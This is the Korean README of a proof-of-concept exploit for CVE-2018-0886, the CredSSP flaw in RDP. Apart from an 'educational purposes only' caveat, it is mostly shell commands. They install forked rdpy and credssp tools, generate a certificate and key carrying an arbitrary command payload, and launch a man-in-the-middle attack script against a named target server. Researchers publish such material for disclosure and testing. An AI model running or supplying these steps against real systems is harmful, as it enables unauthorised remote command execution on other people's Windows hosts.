
CVE-2018-0886을 시연하는 코드
이것은 CVE-2018-0886을 악용하기 위한 PoC 코드입니다. 교육 목적으로만 사용해야 합니다. 이 코드는 rdpy 프로젝트(https://github.com/preempt/rdpy)의 포크에 의존하며, credssp 릴레이도 지원합니다.
Eyal Karni, Preempt 작성 [email protected]
Ubuntu 14를 사용하는 경우 install 파일을 확인하세요.. Ubuntu 16.04에서 테스트되었습니다.
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
모든 도메인에서 서버 인증(Server Authentication)에 적합한 인증서를 내보내세요. (RDP에 사용됩니다. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))
취약점을 악용하는(페이로드를 포함하는) 인증서를 생성하려면 다음을 사용하세요:
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
(ExportedCert는 1단계에서 내보낸 인증서입니다. exploitc.pem, exploitk.pem은 각각 생성된 인증서와 개인 키입니다.)
공격 스크립트를 실행하려면:
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
자세한 내용은 스크립트의 사용법 섹션(--help)에 있습니다.